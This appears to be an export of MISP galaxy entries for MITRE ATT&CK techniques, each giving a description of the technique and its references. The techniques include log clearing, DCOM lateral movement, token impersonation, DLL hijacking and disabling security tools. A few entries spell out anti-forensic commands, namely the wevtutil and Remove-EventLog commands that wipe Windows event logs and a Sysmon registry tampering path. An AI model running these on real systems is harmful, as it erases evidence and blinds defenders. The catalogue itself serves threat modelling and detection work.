https://www.mandiant.com/resources/russian-targeting-gov-business

Rogue Wi-Fi Access Points - T1465

An adversary could set up unauthorized Wi-Fi access points or compromise existing access points and, if the device connects to them, carry out network-based attacks such as eavesdropping on or modifying network communication(Citation: NIST-SP800153)(Citation: Kaspersky-DarkHotel).

The tag is: misp-galaxy:mitre-attack-pattern="Rogue Wi-Fi Access Points - T1465"

Table 5466. Table References

Links

http://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-153.pdf

https://attack.mitre.org/techniques/T1465

https://blog.kaspersky.com/darkhotel-apt/6613/

https://pages.nist.gov/mobile-threat-catalogue/lan-pan-threats/LPN-0.html

Clear Windows Event Logs - T1070.001

Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer’s alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.

The event logs can be cleared with the following utility commands:

  • <code>wevtutil cl system</code>

  • <code>wevtutil cl application</code>

  • <code>wevtutil cl security</code>

These logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command <code>Remove-EventLog -LogName Security</code> to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)

The tag is: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001"

Table 5467. Table References

Links

https://attack.mitre.org/techniques/T1070/001

https://docs.microsoft.com/powershell/module/microsoft.powershell.management/clear-eventlog

https://docs.microsoft.com/windows-server/administration/windows-commands/wevtutil

https://msdn.microsoft.com/library/system.diagnostics.eventlog.clear.aspx

https://ptylu.github.io/content/report/report.html?report=25

Network Share Connection Removal - T1070.005

Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation. Windows shared drive and [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) connections can be removed when no longer needed. [Net](https://attack.mitre.org/software/S0039) is an example utility that can be used to remove network share connections with the <code>net use \\system\share /delete</code> command. (Citation: Technet Net Use)

The tag is: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005"

Table 5468. Table References

Links

https://attack.mitre.org/techniques/T1070/005

https://technet.microsoft.com/bb490717.aspx

Distributed Component Object Model - T1021.003

Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote machines by taking advantage of Distributed Component Object Model (DCOM). The adversary may then perform actions as the logged-on user.

The Windows Component Object Model (COM) is a component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces. Through COM, a client object can call methods of server objects, which are typically Dynamic Link Libraries (DLL) or executables (EXE). Distributed COM (DCOM) is transparent middleware that extends the functionality of COM beyond a local computer using remote procedure call (RPC) technology.(Citation: Fireeye Hunting COM June 2019)(Citation: Microsoft COM)

Permissions to interact with local and remote server COM objects are specified by access control lists (ACL) in the Registry.(Citation: Microsoft Process Wide Com Keys) By default, only Administrators may remotely activate and launch COM objects through DCOM.(Citation: Microsoft COM ACL)

Through DCOM, adversaries operating in the context of an appropriately privileged user can remotely obtain arbitrary and even direct shellcode execution through Office applications(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) as well as other Windows objects that contain insecure methods.(Citation: Enigma MMC20 COM Jan 2017)(Citation: Enigma DCOM Lateral Movement Jan 2017) DCOM can also execute macros in existing documents(Citation: Enigma Excel DCOM Sept 2017) and may also invoke [Dynamic Data Exchange](https://attack.mitre.org/techniques/T1559/002) (DDE) execution directly through a COM created instance of a Microsoft Office application(Citation: Cyberreason DCOM DDE Lateral Movement Nov 2017), bypassing the need for a malicious document. DCOM can be used as a method of remotely interacting with [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047). (Citation: MSDN WMI)

The tag is: misp-galaxy:mitre-attack-pattern="Distributed Component Object Model - T1021.003"

Table 5469. Table References

Links

https://attack.mitre.org/techniques/T1021/003

https://docs.microsoft.com/en-us/windows/desktop/com/dcom-security-enhancements-in-windows-xp-service-pack-2-and-windows-server-2003-service-pack-1

https://enigma0x3.net/2017/01/05/lateral-movement-using-the-mmc20-application-com-object/

https://enigma0x3.net/2017/01/23/lateral-movement-via-dcom-round-2/

https://enigma0x3.net/2017/09/11/lateral-movement-using-excel-application-and-dcom/

https://enigma0x3.net/2017/11/16/lateral-movement-using-outlooks-createobject-method-and-dotnettojscript/

https://msdn.microsoft.com/en-us/library/aa394582.aspx

https://msdn.microsoft.com/en-us/library/windows/desktop/ms687317(v=vs.85).aspx

https://msdn.microsoft.com/library/windows/desktop/ms680573.aspx

https://www.cybereason.com/blog/leveraging-excel-dde-for-lateral-movement-via-dcom

https://www.fireeye.com/blog/threat-research/2019/06/hunting-com-objects.html

Direct Cloud VM Connections - T1021.008

Adversaries may leverage [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log directly into accessible cloud hosted compute infrastructure through cloud native methods. Many cloud providers offer interactive connections to virtual infrastructure that can be accessed through the [Cloud API](https://attack.mitre.org/techniques/T1059/009), such as Azure Serial Console(Citation: Azure Serial Console), AWS EC2 Instance Connect(Citation: EC2 Instance Connect)(Citation: lucr-3: Getting SaaS-y in the cloud), and AWS System Manager.(Citation: AWS System Manager).

Methods of authentication for these connections can include passwords, application access tokens, or SSH keys. These cloud native methods may, by default, allow for privileged access on the host with SYSTEM or root level access.

Adversaries may utilize these cloud native methods to directly access virtual infrastructure and pivot through an environment.(Citation: SIM Swapping and Abuse of the Microsoft Azure Serial Console) These connections typically provide direct console access to the VM rather than the execution of scripts (i.e., [Cloud Administration Command](https://attack.mitre.org/techniques/T1651)).

The tag is: misp-galaxy:mitre-attack-pattern="Direct Cloud VM Connections - T1021.008"

Table 5470. Table References

Links

https://attack.mitre.org/techniques/T1021/008

https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-connect-methods.html

https://docs.aws.amazon.com/systems-manager/latest/userguide/what-is-systems-manager.html

https://learn.microsoft.com/en-us/troubleshoot/azure/virtual-machines/serial-console-overview

https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud

https://www.mandiant.com/resources/blog/sim-swapping-abuse-azure-serial

Remote Device Management Services - T1430.001

An adversary may use access to cloud services (e.g. Google’s Android Device Manager or Apple iCloud’s Find my iPhone) or to an enterprise mobility management (EMM)/mobile device management (MDM) server console to track the location of mobile devices managed by the service.(Citation: Krebs-Location)

The tag is: misp-galaxy:mitre-attack-pattern="Remote Device Management Services - T1430.001"

Table 5471. Table References

Links

https://attack.mitre.org/techniques/T1430/001

https://krebsonsecurity.com/2018/05/tracking-firm-locationsmart-leaked-location-data-for-customers-of-all-major-u-s-mobile-carriers-in-real-time-via-its-web-site/

https://pages.nist.gov/mobile-threat-catalogue/ecosystem-threats/ECO-5.html

https://pages.nist.gov/mobile-threat-catalogue/emm-threats/EMM-7.html

Network Device Configuration Dump - T1602.002

Adversaries may access network configuration files to collect sensitive data about the device and the network. The network configuration is a file containing parameters that determine the operation of the device. The device typically stores an in-memory copy of the configuration while operating, and a separate configuration on non-volatile storage to load after device reset. Adversaries can inspect the configuration files to reveal information about the target network and its layout, the network device and its software, or identifying legitimate accounts and credentials for later use.

Adversaries can use common management tools and protocols, such as Simple Network Management Protocol (SNMP) and Smart Install (SMI), to access network configuration files.(Citation: US-CERT TA18-106A Network Infrastructure Devices 2018)(Citation: Cisco Blog Legacy Device Attacks) These tools may be used to query specific data from a configuration repository or configure the device to export the configuration for later analysis.

The tag is: misp-galaxy:mitre-attack-pattern="Network Device Configuration Dump - T1602.002"

Table 5472. Table References

Links

https://attack.mitre.org/techniques/T1602/002

https://community.cisco.com/t5/security-blogs/attackers-continue-to-target-legacy-devices/ba-p/4169954

https://us-cert.cisa.gov/ncas/alerts/TA18-106A

https://www.us-cert.gov/ncas/alerts/TA18-086A

Indicator Removal from Tools - T1027.005

Adversaries may remove indicators from tools if they believe their malicious tool was detected, quarantined, or otherwise curtailed. They can modify the tool by removing the indicator and using the updated version that is no longer detected by the target’s defensive systems or subsequent targets that may use similar systems.

A good example of this is when malware is detected with a file signature and quarantined by anti-virus software. An adversary who can determine that the malware was quarantined because of its file signature may modify the file to explicitly avoid that signature, and then re-use the malware.

The tag is: misp-galaxy:mitre-attack-pattern="Indicator Removal from Tools - T1027.005"

Table 5473. Table References

Links

https://attack.mitre.org/techniques/T1027/005

Additional Email Delegate Permissions - T1098.002

Adversaries may grant additional permission levels to maintain persistent access to an adversary-controlled email account.

For example, the <code>Add-MailboxPermission</code> [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlet, available in on-premises Exchange and in the cloud-based service Office 365, adds permissions to a mailbox.(Citation: Microsoft - Add-MailboxPermission)(Citation: FireEye APT35 2018)(Citation: Crowdstrike Hiding in Plain Sight 2018) In Google Workspace, delegation can be enabled via the Google Admin console and users can delegate accounts via their Gmail settings.(Citation: Gmail Delegation)(Citation: Google Ensuring Your Information is Safe)

Adversaries may also assign mailbox folder permissions through individual folder permissions or roles. In Office 365 environments, adversaries may assign the Default or Anonymous user permissions or roles to the Top of Information Store (root), Inbox, or other mailbox folders. By assigning one or both user permissions to a folder, the adversary can utilize any other account in the tenant to maintain persistence to the target user’s mail folders.(Citation: Remediation and Hardening Strategies for Microsoft 365 to Defend Against UNC2452)

This may be used in persistent threat incidents as well as BEC (Business Email Compromise) incidents where an adversary can add [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003) to the accounts they wish to compromise. This may further enable use of additional techniques for gaining access to systems. For example, compromised business accounts are often used to send messages to other accounts in the network of the target business while creating inbox rules (ex: [Internal Spearphishing](https://attack.mitre.org/techniques/T1534)), so the messages evade spam/phishing detection mechanisms.(Citation: Bienstock, D. - Defending O365 - 2019)

The tag is: misp-galaxy:mitre-attack-pattern="Additional Email Delegate Permissions - T1098.002"

Table 5474. Table References

Links

https://attack.mitre.org/techniques/T1098/002

https://docs.microsoft.com/en-us/powershell/module/exchange/mailboxes/add-mailboxpermission?view=exchange-ps

https://googleblog.blogspot.com/2011/06/ensuring-your-information-is-safe.html

https://support.google.com/a/answer/7223765?hl=en

https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/

https://www.fireeye.com/blog/threat-research/2021/01/remediation-and-hardening-strategies-for-microsoft-365-to-defend-against-unc2452.html

https://www.fireeye.com/content/dam/collateral/en/mtrends-2018.pdf

https://www.slideshare.net/DouglasBienstock/shmoocon-2019-becs-and-beyond-investigating-and-defending-office-365

Masquerade Task or Service - T1036.004

Adversaries may attempt to manipulate the name of a task or service to make it appear legitimate or benign. Tasks/services executed by the Task Scheduler or systemd will typically be given a name and/or description.(Citation: TechNet Schtasks)(Citation: Systemd Service Units) Windows services will have a service name as well as a display name. Many benign tasks and services exist that have commonly associated names. Adversaries may give tasks or services names that are similar or identical to those of legitimate ones.

Tasks or services contain other fields, such as a description, that adversaries may attempt to make appear legitimate.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Fysbis Dr Web Analysis)

The tag is: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004"

Table 5475. Table References

Links

http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/

https://attack.mitre.org/techniques/T1036/004

https://technet.microsoft.com/en-us/library/bb490996.aspx

https://vms.drweb.com/virus/?i=4276269

https://www.freedesktop.org/software/systemd/man/systemd.service.html

Archive via Custom Method - T1560.003

An adversary may compress or encrypt data that is collected prior to exfiltration using a custom method. Adversaries may choose to use custom archival methods, such as encryption with XOR or stream ciphers implemented with no external library or utility references. Custom implementations of well-known compression algorithms have also been used.(Citation: ESET Sednit Part 2)

The tag is: misp-galaxy:mitre-attack-pattern="Archive via Custom Method - T1560.003"

Table 5476. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part-2.pdf

https://attack.mitre.org/techniques/T1560/003

Additional Container Cluster Roles - T1098.006

An adversary may add additional roles or permissions to an adversary-controlled user or service account to maintain persistent access to a container orchestration system. For example, an adversary with sufficient permissions may create a RoleBinding or a ClusterRoleBinding to bind a Role or ClusterRole to a Kubernetes account.(Citation: Kubernetes RBAC)(Citation: Aquasec Kubernetes Attack 2023) Where attribute-based access control (ABAC) is in use, an adversary with sufficient permissions may modify a Kubernetes ABAC policy to give the target account additional permissions.(Citation: Kuberentes ABAC)

This account modification may immediately follow [Create Account](https://attack.mitre.org/techniques/T1136) or other malicious account activity. Adversaries may also modify existing [Valid Accounts](https://attack.mitre.org/techniques/T1078) that they have compromised.

Note that where container orchestration systems are deployed in cloud environments, as with Google Kubernetes Engine, Amazon Elastic Kubernetes Service, and Azure Kubernetes Service, cloud-based role-based access control (RBAC) assignments or ABAC policies can often be used in place of or in addition to local permission assignments.(Citation: Google Cloud Kubernetes IAM)(Citation: AWS EKS IAM Roles for Service Accounts)(Citation: Microsoft Azure Kubernetes Service Service Accounts) In these cases, this technique may be used in conjunction with [Additional Cloud Roles](https://attack.mitre.org/techniques/T1098/003).

The tag is: misp-galaxy:mitre-attack-pattern="Additional Container Cluster Roles - T1098.006"

Table 5477. Table References

Links

https://attack.mitre.org/techniques/T1098/006

https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters

https://cloud.google.com/kubernetes-engine/docs/how-to/iam

https://docs.aws.amazon.com/eks/latest/userguide/iam-roles-for-service-accounts.html

https://kubernetes.io/docs/concepts/security/rbac-good-practices/

https://kubernetes.io/docs/reference/access-authn-authz/abac/

https://learn.microsoft.com/en-us/azure/aks/concepts-identity

Extra Window Memory Injection - T1055.011

Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.

Before creating a window, graphical Windows-based processes must prescribe to or register a windows class, which stipulate appearance and behavior (via windows procedures, which are functions that handle input/output of data).(Citation: Microsoft Window Classes) Registration of new windows classes can include a request for up to 40 bytes of EWM to be appended to the allocated memory of each instance of that class. This EWM is intended to store data specific to that window and has specific application programming interface (API) functions to set and get its value. (Citation: Microsoft GetWindowLong function) (Citation: Microsoft SetWindowLong function)

Although small, the EWM is large enough to store a 32-bit pointer and is often used to point to a windows procedure. Malware may possibly utilize this memory location in part of an attack chain that includes writing code to shared sections of the process’s memory, placing a pointer to the code in EWM, then invoking execution by returning execution control to the address in the process’s EWM.

Execution granted through EWM injection may allow access to both the target process’s memory and possibly elevated privileges. Writing payloads to shared sections also avoids the use of highly monitored API calls such as <code>WriteProcessMemory</code> and <code>CreateRemoteThread</code>.(Citation: Elastic Process Injection July 2017) More sophisticated malware samples may also potentially bypass protection mechanisms such as data execution prevention (DEP) by triggering a combination of windows procedures and other system functions that will rewrite the malicious payload inside an executable portion of the target process. (Citation: MalwareTech Power Loader Aug 2013) (Citation: WeLiveSecurity Gapz and Redyms Mar 2013)

Running code in the context of another process may allow access to the process’s memory, system/network resources, and possibly elevated privileges. Execution via EWM injection may also evade detection from security products since the execution is masked under a legitimate process.

The tag is: misp-galaxy:mitre-attack-pattern="Extra Window Memory Injection - T1055.011"

Table 5478. Table References

Links

https://attack.mitre.org/techniques/T1055/011

https://msdn.microsoft.com/library/windows/desktop/ms633574.aspx

https://msdn.microsoft.com/library/windows/desktop/ms633584.aspx

https://msdn.microsoft.com/library/windows/desktop/ms633591.aspx

https://msdn.microsoft.com/library/windows/desktop/ms644953.aspx

https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process

https://www.malwaretech.com/2013/08/powerloader-injection-something-truly.html

https://www.welivesecurity.com/2013/03/19/gapz-and-redyms-droppers-based-on-power-loader-code/

Create Process with Token - T1134.002

Adversaries may create a new process with an existing token to escalate privileges and bypass access controls. Processes can be created with the token and resulting security context of another user using features such as <code>CreateProcessWithTokenW</code> and <code>runas</code>.(Citation: Microsoft RunAs)

Creating processes with a token not associated with the current user may require the credentials of the target user, specific privileges to impersonate that user, or access to the token to be used. For example, the token could be duplicated via [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) or created via [Make and Impersonate Token](https://attack.mitre.org/techniques/T1134/003) before being used to create a process.

While this technique is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001), the techniques can be used in conjunction where a token is duplicated and then used to create a new process.

The tag is: misp-galaxy:mitre-attack-pattern="Create Process with Token - T1134.002"

Table 5479. Table References

Links

https://attack.mitre.org/techniques/T1134/002

https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc771525(v=ws.11)

https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

Code Signing Policy Modification - T1632.001

Adversaries may modify code signing policies to enable execution of applications signed with unofficial or unknown keys. Code signing provides a level of authenticity on an app from a developer, guaranteeing that the program has not been tampered with and comes from an official source. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on a device.

Mobile devices generally enable these security controls by default, such as preventing the installation of unknown applications on Android. Adversaries may modify these policies in a number of ways, including [Input Injection](https://attack.mitre.org/techniques/T1516) or malicious configuration profiles.

The tag is: misp-galaxy:mitre-attack-pattern="Code Signing Policy Modification - T1632.001"

Table 5480. Table References

Links

https://attack.mitre.org/techniques/T1632/001

https://pages.nist.gov/mobile-threat-catalogue/stack-threats/STA-7.html

System Runtime API Hijacking - T1625.001

Adversaries may execute their own malicious payloads by hijacking the way an operating system runs applications. Hijacking execution flow can be for the purposes of persistence since this hijacked execution may reoccur at later points in time.

On Android, adversaries may overwrite the standard OS API library with a malicious alternative to hook into core functions to achieve persistence. By doing this, the adversary’s code will be executed every time the overwritten API function is called by an app on the infected device.

The tag is: misp-galaxy:mitre-attack-pattern="System Runtime API Hijacking - T1625.001"

Table 5481. Table References

Links

https://attack.mitre.org/techniques/T1625/001

https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-27.html

Disable or Modify Tools - T1562.001

Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.(Citation: SCADAfence_ransomware)

Adversaries may also tamper with artifacts deployed and utilized by security tools. Security tools may make dynamic changes to system components in order to maintain visibility into specific events. For example, security products may load their own modules and/or modify those loaded by processes to facilitate data collection. Similar to [Indicator Blocking](https://attack.mitre.org/techniques/T1562/006), adversaries may unhook or otherwise modify these features added by tools (especially those that exist in userland or are otherwise potentially accessible to adversaries) to avoid detection.(Citation: OutFlank System Calls)(Citation: MDSec System Calls)

Adversaries may also focus on specific applications such as Sysmon. For example, the “Start” and “Enable” values in <code>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\WMI\Autologger\EventLog-Microsoft-Windows-Sysmon-Operational</code> may be modified to tamper with and potentially disable Sysmon logging.(Citation: disable_win_evt_logging)

On network devices, adversaries may attempt to skip digital signature verification checks by altering startup configuration files and effectively disabling firmware verification that typically occurs at boot.(Citation: Fortinet Zero-Day and Custom Malware Used by Suspected Chinese Actor in Espionage Operation)(Citation: Analysis of FG-IR-22-369)

In cloud environments, tools disabled by adversaries may include cloud monitoring agents that report back to services such as AWS CloudWatch or Google Cloud Monitor.

Furthermore, although defensive tools may have anti-tampering mechanisms, adversaries may abuse tools such as legitimate rootkit removal kits to impair and/or disable these tools.(Citation: chasing_avaddon_ransomware)(Citation: dharma_ransomware)(Citation: demystifying_ryuk)(Citation: doppelpaymer_crowdstrike) For example, adversaries have used tools such as GMER to find and shut down hidden processes and antivirus software on infected systems.(Citation: demystifying_ryuk)

Additionally, adversaries may exploit legitimate drivers from anti-virus software to gain access to kernel space (i.e. [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068)), which may lead to bypassing anti-tampering features.(Citation: avoslocker_ransomware)

The tag is: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001"

Table 5482. Table References

Links

https://attack.mitre.org/techniques/T1562/001

https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf

https://outflank.nl/blog/2019/06/19/red-team-tactics-combining-direct-system-calls-and-srdi-to-bypass-av-edr/

https://ptylu.github.io/content/report/report.html?report=25

https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/demystifying-ransomware-attacks-against-microsoft-defender/ba-p/1928947

https://thehackernews.com/2022/05/avoslocker-ransomware-variant-using-new.html

https://www.crowdstrike.com/blog/how-doppelpaymer-hunts-and-kills-windows-processes/

https://www.crowdstrike.com/blog/targeted-dharma-ransomware-intrusions-exhibit-consistent-techniques/

https://www.fortinet.com/blog/psirt-blogs/fg-ir-22-369-psirt-analysis

https://www.mandiant.com/resources/blog/fortinet-malware-ecosystem

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://www.mdsec.co.uk/2020/12/bypassing-user-mode-hooks-and-direct-invocation-of-system-calls-for-red-teams/

Compromise Software Supply Chain - T1195.002

Adversaries may manipulate application software prior to receipt by a final consumer for the purpose of data or system compromise. Supply chain compromise of software can take place in a number of ways, including manipulation of the application source code, manipulation of the update/distribution mechanism for that software, or replacing compiled releases with a modified version.

Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims.(Citation: Avast CCleaner3 2018)(Citation: Command Five SK 2011)

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Software Supply Chain - T1195.002"

Table 5483. Table References

Links

https://attack.mitre.org/techniques/T1195/002

https://blog.avast.com/new-investigations-in-ccleaner-incident-point-to-a-possible-third-stage-that-had-keylogger-capacities

https://www.commandfive.com/papers/C5_APT_SKHack.pdf

Make and Impersonate Token - T1134.003

Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the LogonUser function. The function will return a copy of the new session’s access token and the adversary can use SetThreadToken to assign the token to a thread.

This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.

The tag is: misp-galaxy:mitre-attack-pattern="Make and Impersonate Token - T1134.003"

Table 5484. Table References

Links

https://attack.mitre.org/techniques/T1134/003

https://technet.microsoft.com/en-us/windows-server-docs/identity/ad-ds/manage/component-updates/command-line-process-auditing

Compromise Hardware Supply Chain - T1195.003

Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals.

The tag is: misp-galaxy:mitre-attack-pattern="Compromise Hardware Supply Chain - T1195.003"

Table 5485. Table References

Links

https://attack.mitre.org/techniques/T1195/003

Change Default File Association - T1546.001

Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.(Citation: Microsoft Change Default Programs)(Citation: Microsoft File Handlers)(Citation: Microsoft Assoc Oct 2017) Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under <code>HKEY_CLASSES_ROOT\.[extension]</code>, for example <code>HKEY_CLASSES_ROOT\.txt</code>. The entries point to a handler for that extension located at <code>HKEY_CLASSES_ROOT\\[handler]</code>. The various commands are then listed as subkeys underneath the shell key at <code>HKEY_CLASSES_ROOT\\[handler]\shell\\[action]\command</code>. For example:

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\open\command</code>

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\print\command</code>

  • <code>HKEY_CLASSES_ROOT\txtfile\shell\printto\command</code>

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.(Citation: TrendMicro TROJ-FAKEAV OCT 2012)

The tag is: misp-galaxy:mitre-attack-pattern="Change Default File Association - T1546.001"

Table 5486. Table References

Links

http://msdn.microsoft.com/en-us/library/bb166549.aspx

https://attack.mitre.org/techniques/T1546/001

https://docs.microsoft.com/windows-server/administration/windows-commands/assoc

https://support.microsoft.com/en-us/help/18539/windows-7-change-default-programs

https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/troj_fakeav.gzd

Hidden Files and Directories - T1564.001

Adversaries may set files and directories to be hidden to evade detection mechanisms. To prevent normal users from accidentally changing special files on a system, most operating systems have the concept of a ‘hidden’ file. These files don’t show up when a user browses the file system with a GUI or when using normal commands on the command line. Users must explicitly ask to show the hidden files either via a series of Graphical User Interface (GUI) prompts or with command line switches (<code>dir /a</code> for Windows and <code>ls –a</code> for Linux and macOS).

On Linux and Mac, users can mark specific files as hidden simply by putting a “.” as the first character in the file or folder name (Citation: Sofacy Komplex Trojan) (Citation: Antiquated Mac Malware). Files and folders that start with a period, ‘.’, are by default hidden from being viewed in the Finder application and standard command-line utilities like “ls”. Users must specifically change settings to have these files viewable.

Files on macOS can also be marked with the UF_HIDDEN flag which prevents them from being seen in Finder.app, but still allows them to be seen in Terminal.app (Citation: WireLurker). On Windows, users can mark specific files as hidden by using the attrib.exe binary. Many applications create these hidden files and folders to store information so that it doesn’t clutter up the user’s workspace. For example, SSH utilities create a .ssh folder that’s hidden and contains the user’s known hosts and keys.

Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files.

The tag is: misp-galaxy:mitre-attack-pattern="Hidden Files and Directories - T1564.001"

Table 5487. Table References

Links

https://attack.mitre.org/techniques/T1564/001

https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/

https://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/

https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf

DLL Search Order Hijacking - T1574.001

Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.

There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)

Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)

If a search order-vulnerable program is configured to run at a higher privilege level, then the adversary-controlled DLL that is loaded will also be executed at the higher level. In this case, the technique could be used for privilege escalation from user to administrator or SYSTEM or from administrator to SYSTEM, depending on the program. Programs that fall victim to path hijacking may appear to behave normally because malicious DLLs may be configured to also load the legitimate DLLs they were meant to replace.

The tag is: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001"

Table 5488. Table References

Links

https://attack.mitre.org/techniques/T1574/001

https://docs.microsoft.com/en-us/security-updates/securityadvisories/2010/2269637

https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-redirection?redirectedfrom=MSDN

https://docs.microsoft.com/en-us/windows/win32/dlls/dynamic-link-library-search-order?redirectedfrom=MSDN

https://msdn.microsoft.com/en-US/library/aa375365

https://www.fireeye.com/blog/threat-research/2010/07/malware-persistence-windows-registry.html

https://www.fireeye.com/blog/threat-research/2010/08/dll-search-order-hijacking-revisited.html

https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html

https://www.owasp.org/index.php/Binary_planting

Services File Permissions Weakness - T1574.010

Adversaries may execute their own malicious payloads by hijacking the binaries used by services. Adversaries may use flaws in the permissions of Windows services to replace the binary that is executed upon service start. These service processes may automatically execute specific binaries as part of their functionality or to perform other actions. If the permissions on the file system directory containing a target binary, or permissions on the binary itself are improperly set, then the target binary may be overwritten with another binary using user-level permissions and executed by the original process. If the original process and thread are running under a higher permissions level, then the replaced binary will also execute under higher-level permissions, which could include SYSTEM.

Adversaries may use this technique to replace legitimate binaries with malicious ones as a means of executing code at a higher permissions level. If the executing process is set to run at a specific time or during a certain event (e.g., system bootup) then this technique can also be used for persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Services File Permissions Weakness - T1574.010"

Table 5489. Table References

Links

https://attack.mitre.org/techniques/T1574/010

Exfiltration to Code Repository - T1567.001

Adversaries may exfiltrate data to a code repository rather than over their primary command and control channel. Code repositories are often accessible via an API (ex: https://api.github.com). Access to these APIs are often over HTTPS, which gives the adversary an additional level of protection.

Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network.

The tag is: misp-galaxy:mitre-attack-pattern="Exfiltration to Code Repository - T1567.001"

Table 5490. Table References

Links

https://attack.mitre.org/techniques/T1567/001

Network Address Translation Traversal - T1599.001

Adversaries may bridge network boundaries by modifying a network device’s Network Address Translation (NAT) configuration. Malicious modifications to NAT may enable an adversary to bypass restrictions on traffic routing that otherwise separate trusted and untrusted networks.

